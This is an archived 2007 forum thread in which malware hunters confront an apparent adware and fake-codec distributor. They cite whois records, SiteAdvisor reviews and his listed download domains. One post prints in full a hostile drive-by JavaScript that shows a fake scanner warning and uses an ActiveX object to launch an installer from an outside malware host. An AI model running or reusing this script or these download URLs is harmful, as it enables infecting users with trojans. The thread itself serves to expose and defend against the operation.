|
Donation/Premium |
|
 |
|
|
|
|
|
|
|
Survey |
|
|
|
|
|
|
|
|
|
|
|
| View previous topic :: View next topic |
| Author |
Message |
haxibus
Cadet
Joined: Jul 11, 2007
Posts: 3
Location: USA
|
 Posted: Wed Jul 11, 2007 9:00 am Post subject: |
|
|
hi. spamming botnet are hitting my forums spamming these links. f*** you people for wasting my time having to delete them, and potentially infecting my users with this bullshit. f*** you guys for posting highly nsfw images in genius threads like "FREE SEX VIDEO LIST 5" on a forum that is read by children under 18. You are going down, i'm not letting this bullshit go on.
this is a dns of one of the sites related to / linking to it:
http://www.dnsstuff.com/tools/whois.ch?ip=toppornclips.com
http://www.dnsstuff.com/tools/whois.ch?ip=free3xmovies.com
both offering this information:
| Quote: | Using 23 day old cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com
Domain Name: FREE3XMOVIES.COM
Registrant:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Creation Date: 27-Nov-2006
Expiration Date: 27-Nov-2007
Domain servers in listed order:
ns1.free3xmovies.com
ns2.free3xmovies.com
Administrative Contact:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Technical Contact:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Billing Contact:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Status:ACTIVE |
so if that's the real whois information, then these guys are based in Kiev, Ukraine. googling that name brings up | Code: | | http://www.amino.dk/view.asp?topicID=10989&pageNo= |
which appears to be dealing somehow with the same thing but i don't see how... I don't recognize the language, and there are no cognates to anything i know except for "hahaha" (real helpful).
is linking to these sites on subpages like | Code: | | http://www.gorunger.com/6.html |
that one, it loads 3xvideos in a frame.
| Code: | | scanner.malwarealarm.com |
also appears to be connected there and is potentially infectious (don't go there just in case) but i'm not inclined to find out. google reveals that it's on at least 1 malware block list.
Edited by moderator for language and to disable the live links
|
|
| Back to top |
|
 |
haxibus
Cadet
Joined: Jul 11, 2007
Posts: 3
Location: USA
|
| Posted: Wed Jul 11, 2007 5:08 pm Post subject: |
|
|
Edited by moderator for language and to disable the live links[/quote]
oh sorry i'll keep it in mind next time, i was angry and tired. i still am, actually.
i'll be back in a few days.
|
|
| Back to top |
|
|
AnthW
Trooper
Joined: Jul 10, 2007
Posts: 16
Location: USA
|
| Posted: Wed Jul 11, 2007 5:16 pm Post subject: |
|
|
| tacktick wrote: | Hi Anthony,
I am encouraged to see you post here.
You say that you are not hiding, so I have a few questions for you.
Is there a business entity and name that you and your team work under?
Are you located in the US?
How do your affiliates connect with and correspond with you?
|
We have many people in our team (Programmers, designers, webmasters) however we dont have any business entity because we dont need one.
I am not in the US. Neither most people from our team.
Our affiliates / partners correspond with us via email or messengers.
| tacktick wrote: |
As you say you are not responsible for all the domains listed here, I am curious as to which ones you do own or are connected with.
(Current Live domains)
Are these yours?
|
The following domains belong to us:
| Code: |
http://www.axvideosetup.com/download.php?id=1862
http://iaxobjectdownload.com/download.php?id=4058
http://installvaxobject.com/download.php?id=4040
http://www.videoaxdownload.com/download.php?id=1303
http://getimageactivex.com/download.php?id=1103
|
These ones are used as promo tools. They belong to us or to our affiliates:
| Code: |
http://www.onlyfreepornvideos.com/
http://todaysfreevideo.com
http://free3xmovies.com
http://www.adultvideosportal.com
http://www.fulltimempegs.com
http://www.freeimageheaven.com/
http://www.dailyxvids.com/
|
All other domains are not ours and we have no connection to them.
I have also an update. We have changed our EULA and it will be updated VERY soon (say 3-4 hours after this post). EULA now has CLEAR description of what software does and how to uninstall it. We almost finished our new 'easy to use' uninstallers. Everything will be removable from Control Panel. No addition uninstaller will be required. They will be online within 24 hours. Our webmaster will start working on a website tomorrow morning.
|
|
| Back to top |
|
|
AnthW
Trooper
Joined: Jul 10, 2007
Posts: 16
Location: USA
|
| Posted: Wed Jul 11, 2007 5:21 pm Post subject: |
|
|
haxibus, I understand your anger.
However your post just proves what i have written before. We cant controll everything and every hit comming to our domains.
Our admins have block the URL with that ID and it is now unavailable.
hXXp://www.gorunger.com/6.html
I am sorry for the webmaster who did this. We do not appreciate this type of 'promotion'.
|
|
| Back to top |
|
|
JeanInMontana
Sergeant
Premium Member
Joined: Jun 20, 2005
Posts: 148
|
| Posted: Wed Jul 11, 2007 6:01 pm Post subject: |
|
|
I don't think there is anyone with a conscious that appreciates your type of "promotion"! Block all of them because all of them are spamming all over with the same crap! No is buying that you are unaware either.
_________________
MontanaMenagerie
|
|
| Back to top |
|
|
haxibus
Cadet
Joined: Jul 11, 2007
Posts: 3
Location: USA
|
| Posted: Wed Jul 11, 2007 7:08 pm Post subject: |
|
|
| AnthW wrote: | haxibus, I understand your anger.
However your post just proves what i have written before. We cant controll everything and every hit comming to our domains.
Our admins have block the URL with that ID and it is now unavailable.
hXXp://www.gorunger.com/6.html
I am sorry for the webmaster who did this. We do not appreciate this type of 'promotion'. |
you spineless piece of ... oh right, i can't curse.
do you think we're idiots? every other subpage on gorunger.com links to virii and scanner.malwarealarm.com. Infact, while you may have removed the image from 6.html the page still opens scanner.malewarealarm.com in a hidden frame and i suspect the only thing that is protecting me from infection is my extremely content-suspicious configuration and heavily updated antivirus. you have some kind of highly evil looking javascript running there:
| Code: | showwindow('x:10000; y:10000', 'w:1; h:1');
is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
is_IE=false;
if (navigator.appName.toLowerCase()=='microsoft internet explorer'){
if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; }
}
if(is_XP_SP2) {
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");
}
if(confirm('NOTICE: If your computer has been running slower than normal, it may be infected with Viruses, Adware or Spyware.\n\nMalwareAlarm will perform a quick and completely FREE scan of your system for malicious programs.\n\nDownload MalwareAlarm for FREE now!'))
{
alert('MalwareAlarm will scan your system for threats now.\n\nPlease select "RUN" or "OPEN" when prompted to start the installation.\n\nThis file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.');
if (is_IE) {
if (is_XP_SP2) {
iie.launchURL("http://scanner.malwarealarm.com/a/Install1136.exe");
} else {
w=screen.width/2-280;
h=screen.height/2-60;
window.open("http://scanner.malwarealarm.com/a/Install1136.exe","new", "width=580,height=180,left="+w+",top="+h);
}
} else {
w=screen.width/2-280;
h=screen.height/2-60;
window.open("http://scanner.malwarealarm.com/a/Install1136.exe", "_blank", "width=580,height=180,left="+w+",top="+h);
}
};
showwindow('x:0; y:0', 'w:' + window.screen.width + '; h:' + window.screen.height);
window.resizeTo(window.screen.width, window.screen.height);
window.open('scan.php', '_self');
window.focus(); |
i suggest we stop arguing with this scum (he's stalling for time) and the moderators check his ip address and if he's not using a proxy server report him to his ISP ASAP and if he's in a country where the police will care, inform them too.
see you guys on friday, i have to go now.
edit: http://www.microsoft.com/technet/security/Bulletin/MS06-078.mspx
it appears to be this exploit.
|
|
| Back to top |
|
|
DLipman
Cadet
Joined: Dec 26, 2005
Posts: 3
Location: USA
|
| Posted: Wed Jul 11, 2007 9:29 pm Post subject: |
|
|
| Quote: | < snip >
do you think we're idiots? every other subpage on gorunger.com links to virii and
< snip > |
Although a bit pedant, please rephrase.
There is NO such terminology of viri or virii. The terminology is viruses. Additionally, the activity seen here is non-viral in the form of trojans such as the ZLob and DNSChanger. I have seen NO connections to "viruses". If there are inded "viruses" associated with this malware group, please provide that information to me.
_________________
--
Dave
http://www.pctipp.ch/downloads/dl/35905.asp
|
|
| Back to top |
|
|
tacktick
MIRT Hunter
Premium Member
Joined: May 19, 2007
Posts: 624
Location: USA
|
| Posted: Thu Jul 12, 2007 12:50 am Post subject: |
|
|
Haxibus, I believe Anthony is saying that gorunger.com is not controlled by him, it is an affiliate.
It looks like that site no longer links to 3xvideos.
The malwarealarm installer is not connected with Video Activex Access as
far as I know.
Please be civil as much as possible, and if you cannot do not post here.
_________________
Analyzing, reporting and removing Malware. Fight the Scourge!
|
|
| Back to top |
|
|
tacktick
MIRT Hunter
Premium Member
Joined: May 19, 2007
Posts: 624
Location: USA
|
| Posted: Thu Jul 12, 2007 1:34 am Post subject: |
|
|
Anthony said:
| Code: |
The following domains belong to us:
http://www.axvideosetup.com/download.php?id=1862
http://iaxobjectdownload.com/download.php?id=4058
http://installvaxobject.com/download.php?id=4040
http://www.videoaxdownload.com/download.php?id=1303
http://getimageactivex.com/download.php?id=1103
These ones are used as promo tools. They belong to us or to our affiliates:
http://www.onlyfreepornvideos.com/
http://todaysfreevideo.com
http://free3xmovies.com
http://www.adultvideosportal.com
http://www.fulltimempegs.com
http://www.freeimageheaven.com/
http://www.dailyxvids.com/
All other domains are not ours and we have no connection to them.
|
To clarify for people who are jumping in here. We are talking about Video Activex Access / Object software available from the links above. According to Anthony, he does not have anything to do with DNSChanger variants, fake codecs and newmediacodec.
_________________
Analyzing, reporting and removing Malware. Fight the Scourge!
|
|
| Back to top |
|
|
suzicat
Microsoft MVP
Premium Member
Joined: Sep 10, 2004
Posts: 416
|
| Posted: Thu Jul 12, 2007 2:17 am Post subject: |
|
|
First, regarding haxibus' use of viri or virii, it may be grammatically and technically incorrect, but many people use that terminology to refer to malware in general. We know that viruses are technically file infectors, but the word virus is also used somewhat generically to mean any malware. I expect that's how haxibus was using the terms. I've found that many people don't really understand the word malware or even trojan, but they do understand virus.
I have some comments for Anthony as well as some feedback on the sites he claims to be associated with.
http://www.siteadvisor.com/sites/onlyfreepornvideos.com/summary/
Reviewer comments:
| Quote: | This is yet another porn site that goads you into downloading a rogue codec so that you can view a video. The rogue codec is served from getaxinstall.com (download.php?id=107). That site is a known source of rogue codecs. Said "codec" is a trojan downloader that will lead to a spyware infestation.
In addition, onlyfreepornvideos.com contains hundreds of links to other porn sites that are known sources of malware, including dailyxvids.com, free3xmovies.com and toppornclips.com. These sites are already rated RED by SiteAdvisor. For more information, see mechBgon's review of getaxinstall.com |
http://www.siteadvisor.com/sites/todaysfreevideo.com Site Advisor reports:
| Quote: | | In our tests, we found downloads on this site that some people consider adware, spyware, or other unwanted programs |
Reviewer comments:
And so on. There are similar comments about other domains.
Sites that Andrew claims "belong to us"
http://www.siteadvisor.com/sites/axvideosetup.com
Reviewer comments:
| Quote: | | As mechBgon has already pointed out, this site is a distribution point for rogue codecs that are downloaded via links from malicious porn sites. This site has no home page - the only thing a visitor (or SiteAdvisor's robots) will see is a "forbidden" message. The malware is distributed from directories within the site that are not accessible from the home page. Naturally, the site registrar is ESTDOMAINS, well-known for their association with fraudulent and malicious web sites. |
http://www.siteadvisor.com/sites/iaxobjectdownload.com/summary/
Reviewer comments:
| Quote: | | This website is bad. The download pretends to be an add-on that lets you view porn pictures, but it is actually a harmful Trojan Horse program from the Zlob family, which will infest your computer with spyware and harrass you to buy worthless, bogus "security" software from the WinFixer gang. |
http://www.siteadvisor.com/sites/installvaxobject.com
http://www.siteadvisor.com/sites/videoaxdownload.com
http://www.siteadvisor.com/sites/getimageactivex.com/summary/
Anthony, would you care to comment on those?
I don't understand this statement:
| Quote: | | We have many people in our team (Programmers, designers, webmasters) however we dont have any business entity because we dont need one. |
I assume the programmers, designers, webmasters and affiliates you referred to make money from the installation of your software. That would indicate to me there is some kind of business arrangement. There has to be a money trail. Whenever money is exchanged for goods or services, that is "business" whether or not you consider it a business entity.
You said:
| Quote: | | I can say that sometimes our adware products are used by our affiliates in unfair tactics such as exploits and stuff. We strongly prohibit this and we block any webmaster’s account found breaking our rules. However we can not predict everything and sometimes we have to deal with dumb webmasters that simply cause us some troubles. |
Blaming your affiliates and "dumb webmasters" is the oldest excuse in the book and does not cut it. You say your affiliates use "unfair tatics such as exploits" and your webmasters "break the rules", but you are directly responsible for their behavior. It is your job to manage and police them. If your software is being installed through exploits or deceptive means, you are fair game for anti-virus, anti-spyware and anti-malware vendors to target. Having a EULA and being able to use Add/Remove Programs does not help as long as the software is being installed through malicious, deceptive means. Managing affiliates and webmasters means doing it proactively, not after they've already broken the rules. There are NO excuses for this.
Regards,
Suzi
|
|
| Back to top |
|
|
IP: 69.232.*.*
Guest
|
|
| Back to top |
|
|
tacktick
MIRT Hunter
Premium Member
Joined: May 19, 2007
Posts: 624
Location: USA
|
| Posted: Thu Jul 12, 2007 3:11 am Post subject: |
|
|
| Anonymous wrote: | http://www.spamhaus.org/sbl/sbl.lasso?query=SBL56511
|
What the heck?
Those are screenshots that I uploaded to freeimagehosting.net myself.
Somebody made a mistake there.
I will send an email to spamhaus.
Thanks.
Update:
I just got an email back from Spamhaus, they fixed this mistake.
Fast response. 
_________________
Analyzing, reporting and removing Malware. Fight the Scourge!
|
|
| Back to top |
|
|
AnthW
Trooper
Joined: Jul 10, 2007
Posts: 16
Location: USA
|
| Posted: Thu Jul 12, 2007 5:19 pm Post subject: |
|
|
haxibus, we do not own or operate domain gorunger.com
When I saw your complaint here, we blocked the URL that webmaster was using to send traffic to us. This is all we can do actually.
We also dont operate malwarealarm.com and have no connection to that domain.
|
|
| Back to top |
|
|
AnthW
Trooper
Joined: Jul 10, 2007
Posts: 16
Location: USA
|
| Posted: Thu Jul 12, 2007 5:40 pm Post subject: |
|
|
| suzicat wrote: |
...
Anthony, would you care to comment on those?
|
Yes.
I didn't want to quote the whole message, so let me give some small comments on those 'reviews'
1. We dont use term codec on our websites. So I think whoever posted a comment on SiteAdviser had made a mistake.
2. "In our tests, we found downloads on this site that some people consider adware, spyware, or other unwanted programs"
I also think that our software is adware. So? I totally agree with this term.
3. "This website is bad... actually a harmful Trojan Horse ..."
As far as I know "Trojan" is something that downloads something else secreetly. Isn't it? If it is, then why is our software a trojan?
We have warned user in EULA about what will be installed. Installation process is not a secret. User can see what is being done and process can be canceled at anytime.
As for affiliates... We didnt say that "dumb webmasters" is a good excuse. I gave my appologies to haxibus and we blocked the URL after I saw his complaint. We strongly prohibit spam or using exploits, thats why we have terms and install wizzard. User has to click Next button and noone actually forces him to do that. There is no AUTO-install or something. I think this is quite enogh to prevent exploit or any other 'auto-install' tactics.
|
|
| Back to top |
|
|
JeanInMontana
Sergeant
Premium Member
Joined: Jun 20, 2005
Posts: 148
|
| Posted: Thu Jul 12, 2007 6:10 pm Post subject: |
|
|
Anthony one of your promotion sites is offering up teen porn. Teens are considered children until at least 18 and in some cases 21, which makes this child porn. hxxp://www.onlyfreepornvideos.com/ IP address 81.0.250.249
How can you justify that? Or is that the reason you have that site hosted in the Czech Republic?
_________________
MontanaMenagerie
|
|
| Back to top |
|
|
|
|
|
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum
|
Powered by phpBB © 2001 phpBB Group
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
